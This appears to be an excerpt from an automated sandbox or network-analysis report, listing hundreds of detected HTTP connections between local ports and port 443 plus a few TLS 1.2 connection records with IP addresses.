Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49802 version: TLS 1.2
